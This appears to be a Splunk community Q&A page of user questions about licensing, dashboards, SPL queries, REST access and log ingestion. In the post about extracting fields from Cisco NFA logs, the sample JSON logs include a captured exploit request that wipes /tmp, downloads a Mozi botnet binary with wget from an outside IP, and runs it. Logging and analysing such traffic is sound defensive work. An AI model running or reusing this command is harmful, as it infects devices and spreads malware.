All Topics

Find Answers
Ask questions. Get answers. Find technical product solutions from passionate members of the Splunk community.


Hello, we recently installed Splunk. We thought we had a free license, but we received a notice that we have exceeded the quota and the license has been blocked. We have changed the license group to Free, but search is still blocked. How can we unlock it? Thank you very much and greetings!
Hi, I have created a watchlist, AWS_IPs, and added IP addresses to it. I have also created an anomaly action rule (AAR) to reduce the anomaly score by 3 and attached the AWS_IPs watchlist to it. However, I do not see this AAR being applied to anomalies whose IP addresses are listed in the watchlist. Can anyone please suggest what the reason might be and how I can resolve it? Thanks!
Hi all, can we leverage AppDynamics to update a CMDB (ServiceNow or any other CMDB) based on the auto-discovery it performs for applications?
I have a dashboard with two panels: one shows errors and a count of how many times each similar error has occurred; the other shows the details of an error when it is clicked. The error string sometimes contains characters like <, >, \, etc., and Splunk does not read them as a plain string but as special characters, which results in an error on the panel. I would like to escape all the possible characters in one go. Currently, my query looks like this:

index=index_name sourcetype="sourcetype_name" [ | makeresults | eval cleansearch=replace(replace("$search$", "<", "\<"), ">", "\>") | return $cleansearch ]

Is there anything simpler I could use that would escape all the characters that could cause an issue, instead of replacing each character individually?
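One way to avoid nesting a replace() call per character is a single regex character class, which SPL's replace() also accepts. A minimal sketch of the logic in Python (the exact set of characters to escape is an assumption; extend the class as needed):

```python
import re

def escape_specials(s):
    """Backslash-escape every character that tends to break a search
    token, in one pass with a single regex character class."""
    return re.sub(r'([<>\\"|=])', r'\\\1', s)

print(escape_specials('a<b>c'))  # a\<b\>c
```

The equivalent single SPL call would be replace("$search$", "([<>\\\\])", "\\\1"), with the class widened to whatever characters break your drilldown.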
Hi all, I was wondering what steps are involved in developing a Splunk alert that creates an incident ticket in ServiceNow, where the ticket is updated if further alerts are triggered by the same folder/account. E.g., a Splunk alert is triggered and an incident ticket is created; when the same Splunk alert is triggered for the same person/folder/entity, instead of creating a new incident ticket it appends to the one already created and open. I've found some docs on integrating Splunk and SNOW, but regarding the alert side of things the documentation seems outdated: "Scripted Alert is now a deprecated Splunk feature. The best practice is to use custom alert actions instead." If that's the case, how should I implement the Splunk alert?
I have a Splunk dashboard, shown below, with some input fields. As you can see, the default value for the Host input is the wildcard *. If I click the "Show" checkbox under Latency Validation Check, a panel is displayed below it. As a good practice, how do I disable executing the search when someone uses the wildcard in the Host input, since the input is used as a token in the search? The Latency Validation Check search should execute only when a valid hostname is given as the Host input. Note: I need the wildcard as the default entry for the Host input because some other panels use it; I only want to restrict the wildcard for this one particular panel. Code can be found below:

<input type="text" token="host">
  <label>Host</label>
  <default>*</default>
</input>
<input type="checkbox" token="overview">
  <label>Latency Validation Check</label>
  <choice value="true">Show</choice>
  <change>
    <condition label="Show">
      <set token="overview">true</set>
    </condition>
  </change>
</input>
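One common pattern for this (a sketch, assuming Splunk 6.6 or later, where a change condition's match attribute accepts an eval expression over the input's value): set a gating token from the Host input's change handler, and make only the latency panel depend on it, so its search never runs while the input is still the bare wildcard.

```
<input type="text" token="host">
  <label>Host</label>
  <default>*</default>
  <change>
    <condition match="match(value, &quot;^\*$&quot;)">
      <unset token="host_ok"></unset>
    </condition>
    <condition>
      <set token="host_ok">true</set>
    </condition>
  </change>
</input>

<!-- gate the Latency Validation panel on both tokens -->
<panel depends="$overview$,$host_ok$">
  ...
</panel>
```

The other panels keep using $host$ directly, so the wildcard default still works for them.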
I am trying to set up an index page in a Splunk Dashboard Studio dashboard that redirects to other Splunk dashboards based on a dropdown. The dropdown has three values; based on the selected value, the dashboard should be updated with that category's dashboard list, where a click redirects to that category's Splunk dashboard. For example, in image 1 below the type is B-004, and both boxes are updated with the same link given in the static input. I was expecting BOX1 to be updated with https://B-004/logs and BOX2 to be updated with https://B-004/results, as in image 2. Please find the code below. Also, what would the SPL be if I wanted to display a string name instead of a number for the URL? Appreciate your help; thanks in advance.

image 1:

image 2:

code for image 1:

{
    "visualizations": {
        "viz_Hpfgo6KN": {
            "type": "viz.rectangle",
            "options": {
                "stroke": "transparent",
                "fill": "#1A1C20",
                "rx": 4
            }
        },
        "viz_lto5aays": {
            "type": "viz.text",
            "options": {
                "content": "box1",
                "fontSize": 14,
                "fontWeight": "bold",
                "textColor": "#FBFBFB"
            }
        },
        "viz_AJxRjGHA": {
            "type": "abslayout.line",
            "options": {
                "strokeColor": "#33343B"
            }
        },
        "viz_ZI34ttXn": {
            "type": "viz.singlevalue",
            "options": {
                "backgroundColor": "#ffffff"
            },
            "dataSources": {
                "primary": "ds_pQ72LSdV"
            },
            "eventHandlers": [
                {
                    "type": "drilldown.customUrl",
                    "options": {
                        "url": "$myWebsiteToken$",
                        "newTab": true
                    }
                }
            ]
        },
        "viz_Nd21m86c": {
            "type": "viz.rectangle",
            "options": {
                "stroke": "transparent",
                "fill": "#1A1C20",
                "rx": 4
            }
        },
        "viz_icJmS4Ub": {
            "type": "viz.text",
            "options": {
                "content": "box2",
                "fontSize": 14,
                "fontWeight": "bold",
                "textColor": "#FBFBFB"
            }
        },
        "viz_mSmorwn2": {
            "type": "viz.singlevalue",
            "options": {
                "backgroundColor": "#ffffff"
            },
            "dataSources": {
                "primary": "ds_gy5Vi8dr_ds_pQ72LSdV"
            },
            "eventHandlers": [
                {
                    "type": "drilldown.customUrl",
                    "options": {
                        "url": "$myWebsiteToken$",
                        "newTab": true
                    }
                }
            ]
        }
    },
    "dataSources": {
        "ds_pQ72LSdV": {
            "type": "ds.search",
            "options": {
                "query": "index= _internal\n| stats count",
                "queryParameters": {
                    "earliest": "-4h@m",
                    "latest": "now"
                }
            },
            "name": "Search_1"
        },
        "ds_gy5Vi8dr_ds_pQ72LSdV": {
            "type": "ds.search",
            "options": {
                "query": "index= _internal\n| stats count",
                "queryParameters": {
                    "earliest": "-4h@m",
                    "latest": "now"
                }
            },
            "name": "Copy of Search_1"
        }
    },
    "inputs": {
        "staticInput": {
            "type": "input.dropdown",
            "options": {
                "items": [
                    {
                        "label": "A-002",
                        "value": "https://A-002/"
                    },
                    {
                        "label": "B-004",
                        "value": "https://B-004/"
                    },
                    {
                        "label": "C-005",
                        "value": "https://C-005/"
                    }
                ],
                "token": "myWebsiteToken"
            },
            "title": "type"
        }
    },
    "layout": {
        "type": "absolute",
        "options": {
            "height": 1100,
            "showTitleAndDescription": false,
            "backgroundColor": "#111215",
            "width": 1500,
            "display": "auto-scale"
        },
        "globalInputs": [
            "staticInput"
        ],
        "structure": [
            { "item": "viz_Hpfgo6KN", "type": "block", "position": { "x": 0, "y": 0, "w": 390, "h": 360 } },
            { "item": "viz_lto5aays", "type": "block", "position": { "x": 0, "y": 0, "w": 300, "h": 50 } },
            { "item": "viz_AJxRjGHA", "type": "line", "position": { "from": { "x": 1496, "y": 212 }, "to": { "x": -3, "y": 212 } } },
            { "item": "viz_ZI34ttXn", "type": "block", "position": { "x": 70, "y": 120, "w": 250, "h": 130 } },
            { "item": "viz_Nd21m86c", "type": "block", "position": { "x": 400, "y": 0, "w": 390, "h": 360 } },
            { "item": "viz_icJmS4Ub", "type": "block", "position": { "x": 430, "y": 20, "w": 300, "h": 50 } },
            { "item": "viz_mSmorwn2", "type": "block", "position": { "x": 500, "y": 140, "w": 250, "h": 130 } }
        ]
    },
    "description": "Viz Description Here",
    "title": "testing_index"
}
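Both drilldowns above point at the bare $myWebsiteToken$, so BOX1 and BOX2 will always resolve to the same link. A minimal sketch of one fix, assuming the dropdown values stay base URLs such as https://B-004/: append the differing path inside each visualization's drilldown url option.

```
"viz_ZI34ttXn": {
    "eventHandlers": [
        {
            "type": "drilldown.customUrl",
            "options": { "url": "$myWebsiteToken$logs", "newTab": true }
        }
    ]
},
"viz_mSmorwn2": {
    "eventHandlers": [
        {
            "type": "drilldown.customUrl",
            "options": { "url": "$myWebsiteToken$results", "newTab": true }
        }
    ]
}
```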
Hi, I am monitoring Postgres databases using a Prometheus server and have set up alerts using Alertmanager. I am now trying to integrate alerting from Alertmanager in Prometheus into Splunk using an HTTP endpoint and HEC in Splunk. Please suggest whether this is possible and, if yes, how.
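This is generally possible via Alertmanager's webhook receiver pointed at a small relay (or, with some versions, directly at HEC). As a sketch of the translation step only, assuming the standard Alertmanager webhook payload shape and HEC's event endpoint (/services/collector/event, with an Authorization: Splunk <token> header on the POST):

```python
import json

def alertmanager_to_hec(payload, sourcetype="alertmanager"):
    """Wrap each alert from an Alertmanager webhook body in the
    {"sourcetype": ..., "event": ...} envelope HEC expects; the
    resulting objects can be POSTed newline-delimited in one request."""
    return [
        {"sourcetype": sourcetype, "event": alert}
        for alert in payload.get("alerts", [])
    ]

webhook = {"alerts": [{"status": "firing", "labels": {"alertname": "PgDown"}}]}
print(json.dumps(alertmanager_to_hec(webhook)))
```

The actual POST (URL, token, TLS settings) is deployment-specific and omitted here.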
Hello all, I am trying to calculate the average of a column, but I want it to ignore all values that are equal to 0. This is what I currently have:

stats avg(ComplianceScore) as CS by GeoLocation

But I need it to calculate the average only when ComplianceScore is not zero. Thank you, Marco
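In SPL this is usually done by turning zeros into null before averaging, since avg() skips null values, e.g. stats avg(eval(if(ComplianceScore!=0, ComplianceScore, null()))) as CS by GeoLocation. A sketch of the same logic in Python to make the behavior concrete:

```python
def avg_nonzero(values):
    """Average a list while ignoring zeros, mirroring
    avg(eval(if(ComplianceScore!=0, ComplianceScore, null()))).
    Returns None when every value is zero (avg of all-null in SPL)."""
    nonzero = [v for v in values if v != 0]
    return sum(nonzero) / len(nonzero) if nonzero else None

print(avg_nonzero([80, 0, 90, 0, 100]))  # 90.0
```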
1. How can a non-admin user access the Splunk REST APIs? 2. After getting the session key, search ID, and search status, we are trying to get the search results, but they come back null.

curl -u $user:$password -k https://localhost:8089/servicesNS/admin/search/search/jobs/sid/results/ --get

Any comments are much appreciated. Thank you.
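Two things commonly cause the null result here: the job is not DONE yet, and the URL uses the admin namespace for a job owned by another user. A sketch of the endpoint shape to try instead (assuming the non-admin user owns the job and their role has the search capabilities): address the job under that user's own namespace and ask for JSON explicitly.

```python
def results_url(base, user, app, sid):
    """Build the search-results endpoint for a job owned by `user`.
    A non-admin user can read jobs in their own user/app namespace,
    rather than under /servicesNS/admin/...."""
    return f"{base}/servicesNS/{user}/{app}/search/jobs/{sid}/results?output_mode=json"

print(results_url("https://localhost:8089", "alice", "search", "1643640000.123"))
```

The hostname, user, and sid above are placeholders; poll the job until dispatchState is DONE before fetching results.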
Cisco logs in JSON format are not extracting properly. I tried these kv delimiters from the GUI in search and they work fine:

| kv pairdelim="," kvdelim="=:"

But how can I save them? Or do we have an alternate way to extract these fields?

2022-01-31T13:11:20.233100-05:00 prd-vswnfa.bbtnet.com {"source": "cisco_nfa", "time": "2022-01-31 16:26:47+00:00", "alert": "http-shell-cmd", "tactic": "Initial Access", "ttp": "Exploit Public-Facing Application", "flow_id": "13847779", "app": "HTTP", "user": "", "s_hg": "China,CHINA UNICOM China169 Backbone", "s_ip": "125.46.191.152", "s_port": 41007, "s_bytes": 245, "s_payload": "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://125.46.191.152:39222/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1", "p_hg": "Public Space BBT", "p_ip": "74.120.69.217", "p_port": 80, "p_bytes": 303, "p_payload": "301 301 Moved Permanently"}

2022-01-31T13:11:20.202060-05:00 prd-vswnfa.bbtnet.com {"source": "cisco_nfa", "time": "2022-01-31 14:28:58+00:00", "alert": "log4j-shell-recon", "tactic": "Reconnaissance", "ttp": "Gather Victim Host Information", "flow_id": "13842059", "app": "HTTPS", "user": "", "s_hg": "Log4j Watchlist,Brute Force,Apache,Germany,Tor IP,Tor Exit IP", "s_ip": "185.220.101.157", "s_port": 9390, "s_bytes": 820, "s_payload": "............,.lb....Z.....", "p_hg": "Public Space BBT", "p_ip": "74.120.69.238", "p_port": 443, "p_bytes": 1460, "p_payload": "...m..J..4.v.A....\"FJ...:."}
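To persist the same delimiter-based extraction at search time, one option is a REPORT stanza using DELIMS, which mirrors the | kv pairdelim/kvdelim call. A sketch (the sourcetype name cisco:nfa and stanza names are assumptions; substitute your own):

```
# props.conf
[cisco:nfa]
REPORT-nfa_kv = cisco_nfa_kv

# transforms.conf
[cisco_nfa_kv]
DELIMS = ",", "=:"
```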
Hey Splunkers. Quick question regarding my lookup. I have the identity lookup with ES and I'd like to replace the 'priority' column value with the value in a separate lookup. For example, my (abbreviated) identity lookup looks like this:

identity   prefix    nick         priority
--------   ------    ----         --------
asmith     (blank)   Adam Smith   medium
cjean      (blank)   Carol Jean   medium
bjean      (blank)   Billy Jean   medium

I'd like to replace the priority value 'medium' in the above lookup with the matching value from my separate lookup, which looks like:

identity   priority
--------   --------
asmith     high
cjean      low

So the original lookup would become:

identity   prefix    nick         priority
--------   ------    ----         --------
asmith     (blank)   Adam Smith   high
cjean      (blank)   Carol Jean   low
bjean      (blank)   Billy Jean   medium

I'm having trouble getting started on the search. How would I do this so that matches are updated, but if no match is present, the original value is kept? Thanks!
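In SPL the usual pattern is a lookup followed by coalesce, e.g. | inputlookup identities | lookup priority_overrides identity OUTPUT priority as new_priority | eval priority=coalesce(new_priority, priority) | fields - new_priority (the lookup and field names here are assumptions). A sketch of the same keep-original-on-no-match logic in Python:

```python
def apply_overrides(rows, overrides):
    """Replace each row's priority with the override for its identity,
    keeping the original value when there is no match (coalesce)."""
    return [
        {**row, "priority": overrides.get(row["identity"], row["priority"])}
        for row in rows
    ]

rows = [{"identity": "asmith", "priority": "medium"},
        {"identity": "bjean", "priority": "medium"}]
print(apply_overrides(rows, {"asmith": "high", "cjean": "low"}))
```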
I made a custom TA in /opt/splunk/etc/apps/myTA/ and created a script called myTA/bin/scripts/pulldata.sh. The script makes temp files and attempts to save them in myTA/bin/scripts/, but it gets errors writing to that path. I can run the script from the CLI using ./pulldata.sh as the splunk user, and it writes the temp files to the scripts directory fine. I also tried /opt/splunk/bin/splunk cmd /opt/splunk/etc/apps/myTA/scripts/pulldata.sh, but that has issues writing the temp files too. I'm assuming that Splunk only lets scripts write files in specific directories. Is there a specific/correct location where I should be placing these temp files? I'm thinking I could write to /opt/splunk/var/log/splunk, but I want to know what the Splunk-recommended path is for this kind of thing. I remember seeing information about this at some point on dev.splunk.com but can't seem to find it anymore. This is what I have been looking at: https://dev.splunk.com/enterprise/docs/developapps/createapps/appanatomy/ Thanks in advance!
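A common convention (an assumption on my part, not an official mandate) is to keep scratch files out of the app's bin directory and write them under $SPLUNK_HOME/var/run/<app>, falling back to the OS temp directory when $SPLUNK_HOME is not set. A sketch of that path selection:

```python
import os
import tempfile

def scratch_dir(app="myTA"):
    """Prefer $SPLUNK_HOME/var/run/<app> for scratch files; fall back
    to the OS temp directory outside of a Splunk environment."""
    splunk_home = os.environ.get("SPLUNK_HOME")
    if splunk_home:
        path = os.path.join(splunk_home, "var", "run", app)
    else:
        path = os.path.join(tempfile.gettempdir(), app)
    os.makedirs(path, exist_ok=True)
    return path

print(scratch_dir())
```

The shell equivalent would be mkdir -p "${SPLUNK_HOME:-$(dirname $(mktemp -u))}/var/run/myTA" inside pulldata.sh.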
I have a dashboard (form) with a dropdown to choose between two different types of "changes" that may have happened in one of our environments. When one of the dropdown options is chosen, a table is populated with results. The dropdown menu is configured:

<choice value="index=something blah blah blah | table 1 2 3">Config Change</choice>
<choice value="index=another_index blah blah blah | table 7 8 9">Admin Change</choice>

The table portion is configured:

<query>$tok_change$</query>

This all works great. I now need to eval a field called Name in the Config Change "choice"; this Name field will have a value of "A change to the system was made." The problem comes in when I add the following to the SPL:

eval Name="A change to the system was made"

I receive the following message: "Error on line 8: Invalid attribute name". I figure it has something to do with the quotes in the eval statement, but I can't make this work. Any help / guidance is greatly appreciated.
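The likely cause: the double quotes in the eval terminate the XML attribute value early. Inside a choice value attribute they need to be XML-escaped as &quot;. A sketch of the escaped form (search body abbreviated as in the original):

```
<choice value="index=something blah blah blah | eval Name=&quot;A change to the system was made&quot; | table 1 2 3">Config Change</choice>
```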
We are trying to iterate result rows and columns in the same order as the table before the custom command. The 'records' object in the custom command code iterates in order by row, but changes the order of the columns.

def reduce(self, records):
    for record in records:
        yield record

This example of the reduce method of a ReportingCommand prints the results in a different column order than the original search. We need to iterate 'records' in the same row and column order as the original. Any ideas?
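One workaround sketch (an assumption about the cause, not an official SDK fix): pin the column order yourself by rebuilding every yielded record as an OrderedDict keyed by the first record's field names, so downstream serialization cannot reshuffle the fields.

```python
from collections import OrderedDict

def reduce_ordered(records):
    """Yield records with a fixed column order taken from the first
    record, so every row carries the same field sequence."""
    field_order = None
    for record in records:
        if field_order is None:
            field_order = list(record.keys())
        yield OrderedDict((f, record.get(f, "")) for f in field_order)

rows = [{"a": 1, "b": 2}, {"b": 4, "a": 3}]
print([list(r.items()) for r in reduce_ordered(iter(rows))])
```

Inside the command, the body of reduce(self, records) would do the same re-keying before yielding.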
I've uploaded the Splunk tutorial data successfully into my Splunk Enterprise instance. There is also a prices.csv.zip. Do I upload that file the exact same way as tutorialdata.zip?
I am currently using the Splunk TA for Palo Alto data, ingesting data from Cortex Data Lake into a new Azure syslog server. But there is a large problem with the data we're ingesting: it is missing a single field. Below is a reference for what we should be ingesting: Configuration Syslog Field Order (paloaltonetworks.com). If you look at the example from that link, you will see this log:

Oct 13 20:56:15 gke-standard-cluster-2-pool-1-6ea9f13a-fnid 394 <142>1 2020-10-13T20:56:15.519Z stream-logfwd20-156653024-10121421-eq28-harness-16kn logforwarder - panwlogs - 1,​2020-10-13T20:56:03.000000Z,​007051000113358,​CONFIG,​config,​,​2020-10-13T20:56:00.000000Z,​xxx.xx.x.xx,​,​rename,​admin,​,​submitted,​/config/shared/log-settings/globalprotect/match-list/entry[@name='rs-globalprotect'],​150,​-9223372036854775808,​0,​0,​0,​0,​,​PA-VM,​,​,​,​2020-10-13T20:56:00.284000Z

But what I'm receiving is:

Oct 13 20:56:15 gke-standard-cluster-2-pool-1-6ea9f13a-fnid 394 <142>1 2020-10-13T20:56:15.519Z stream-logfwd20-156653024-10121421-eq28-harness-16kn logforwarder - panwlogs - ​2020-10-13T20:56:03.000000Z,​007051000113358,​CONFIG,​config,​,​2020-10-13T20:56:00.000000Z,​xxx.xx.x.xx,​,​rename,​admin,​,​submitted,​/config/shared/log-settings/globalprotect/match-list/entry[@name='rs-globalprotect'],​150,​-9223372036854775808,​0,​0,​0,​0,​,​PA-VM,​,​,​,​2020-10-13T20:56:00.284000Z

In the log I'm receiving, the first field and its comma are missing before the 2020 in this line:

harness-16kn logforwarder - panwlogs - ​2020-10-13T20:56:03.000000Z

I should be receiving data that looks like this:

harness-16kn logforwarder - panwlogs - 1,​2020-10-13T20:56:03.000000Z

I'm at a loss as to where this data is generated: by the syslog server, by the Unix server hosting syslog, or on the Palo Alto Cortex Data Lake side. The logs are passed through our firewall to the syslog server.
I believe this field is either 'log_source_id' or 'log_type.value'.  But outside of that, I'm at a loss as to where this value is generated.  Any help is appreciated.   - TitanAE    
The Python debugger in the Splunk Extension does not work when debugging a custom command (reporting command). It runs fine without the debugger, but with the debugger it crashes at the dispatch() function and returns the following traceback:

Traceback (most recent call last):
  File "/opt/splunk/etc/apps/<app>/bin/<command>.py", line 149, in <module>
    dispatch(exportExcel, sys.argv, sys.stdin, sys.stdout, __name__)
  File "/opt/splunk/etc/apps/<app>/bin/../lib/splunklib/searchcommands/search_command.py", line 1144, in dispatch
    command_class().process(argv, input_file, output_file, allow_empty_input)
  File "/opt/splunk/etc/apps/<app>/bin/../lib/splunklib/searchcommands/search_command.py", line 450, in process
    self._process_protocol_v2(argv, ifile, ofile)
  File "/opt/splunk/etc/apps/<app>/bin/../lib/splunklib/searchcommands/search_command.py", line 788, in _process_protocol_v2
    self._record_writer.write_metadata(self._configuration)
  File "/opt/splunk/etc/apps/<app>/bin/../lib/splunklib/searchcommands/internals.py", line 813, in write_metadata
    self._write_chunk(metadata, '')
  File "/opt/splunk/etc/apps/<app>/bin/../lib/splunklib/searchcommands/internals.py", line 843, in _write_chunk
    self.write(start_line)
  File "/opt/splunk/etc/apps/<app>/bin/../lib/splunklib/searchcommands/internals.py", line 557, in write
    self.ofile.write(data)
  File "/opt/splunk/etc/apps/SA-VSCode/bin/ptvsd/_vendored/pydevd/_pydevd_bundle/pydevd_io.py", line 40, in write
    r.write(s)
TypeError: write() argument must be str, not bytes

The custom command code is similar to the Python examples in the SDK repo: https://github.com/splunk/splunk-sdk-python/tree/master/examples/searchcommands_app/package/bin Any help will be appreciated.
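The traceback suggests the debugger's stdout redirector only accepts str while the SDK writes bytes chunks. As a workaround sketch (not an official fix for either library): sys.stdout can be rewrapped in an adapter that decodes bytes before delegating, prior to calling dispatch().

```python
import io

class BytesToStrWriter:
    """Wrap a text-only stream so that bytes payloads are decoded
    before being written; other attributes are delegated unchanged."""
    def __init__(self, stream, encoding="utf-8"):
        self._stream = stream
        self._encoding = encoding

    def write(self, data):
        if isinstance(data, bytes):
            data = data.decode(self._encoding)
        return self._stream.write(data)

    def __getattr__(self, name):
        return getattr(self._stream, name)

# demo against an in-memory text stream
buf = io.StringIO()
BytesToStrWriter(buf).write(b"chunked 1.0,10,0\n")
print(buf.getvalue())
```

In the command script this would look like dispatch(exportExcel, sys.argv, sys.stdin, BytesToStrWriter(sys.stdout), __name__); whether the SDK accepts a text-mode wrapper in every code path is untested here.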
We have upgraded from 8.1.6 to 8.1.7.2 and are not able to see the resource details on the overview page. Please find the attached screenshot. Kindly advise: is this a known issue?
Hi, I looked for an answer and some came close, but I could not get it working. Here is the problem description: I have a field that contains the status of a ticket ("created_done"). I can easily count the number using by, or by doing this:

| stats count(eval(created_done="created")) as created count(eval(created_done="done")) as done by title impact

However, I would like something like this:

| stats count by title impact status

where status at this point is a field holding the sum of solved tickets and the sum of open tickets:

Title     Impact     Status   Count
title 1   impact 1   solved   90
title 1   impact 1   open     5
title 1   impact 2   solved   45
title 1   impact 2   open     3

Probably this has already been answered, and I apologize in advance, but I could not get any solution working. Kind regards, Mike
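In SPL this can be as simple as deriving the status field before the stats, e.g. | eval status=if(created_done="done", "solved", "open") | stats count by title impact status (the solved/open mapping from created/done is an assumption). A sketch of the same grouping in Python:

```python
from collections import Counter

def count_by_status(events):
    """Count events grouped by (title, impact, status), where status
    is derived from the created_done field."""
    counts = Counter()
    for e in events:
        status = "solved" if e["created_done"] == "done" else "open"
        counts[(e["title"], e["impact"], status)] += 1
    return counts

events = [{"title": "t1", "impact": "i1", "created_done": "done"},
          {"title": "t1", "impact": "i1", "created_done": "created"},
          {"title": "t1", "impact": "i1", "created_done": "done"}]
print(count_by_status(events))
```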